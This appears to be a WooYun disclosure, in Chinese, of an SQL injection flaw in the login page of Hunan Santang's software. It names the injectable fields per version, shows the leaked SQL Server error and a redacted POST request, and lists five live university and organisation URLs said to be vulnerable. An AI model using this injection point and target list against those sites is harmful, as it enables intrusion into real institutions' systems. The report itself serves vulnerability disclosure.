WooYun.org

http://www.santang.com.cn/GcList.aspx?BigClassId=157&SmallClassId=158&KeyWord=&Page=1  湖南三唐信息科技有限公司

POST /defaultnew.aspx
注入参数
v4.0是username、 v5.0是txtUserName3

“/”应用程序中的服务器错误。
字符串 'a' ) )' 之前有未闭合的引号。 第 1 行: 'a' ) )' 附近有语法错误。
说明: 执行当前 Web 请求期间，出现未处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。 
异常详细信息: System.Data.SqlClient.SqlException: 字符串 'a' ) )' 之前有未闭合的引号。 第 1 行: 'a' ) )' 附近有语法错误。

POST /defaultnew.aspx HTTP/1.1
Host: ****.***.***.***
Proxy-Connection: keep-alive
Content-Length: 210
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://****.***.***.***
User-Agent: *******
Content-Type: application/x-www-form-urlencoded
Referer: http://****.***.***.***/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ***
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=******&__VIEWSTATEGENERATOR=****&UserName=a&PassWord=a&Submit.x=69&Submit.y=4&radiobutton=R2

http://zgp.njutcm.edu.cn/defaultnew.aspx  v4.0
http://expteach.gzhu.edu.cn/defaultnew.aspx  v4.0
http://jwmis.hnie.edu.cn/sysgl/defaultnew.aspx  v4.0
http://www.gyu.cn:9100/defaultnew.aspx  v5.0
http://www.hnrku.net.cn:8003/defaultnew.aspx  v5.0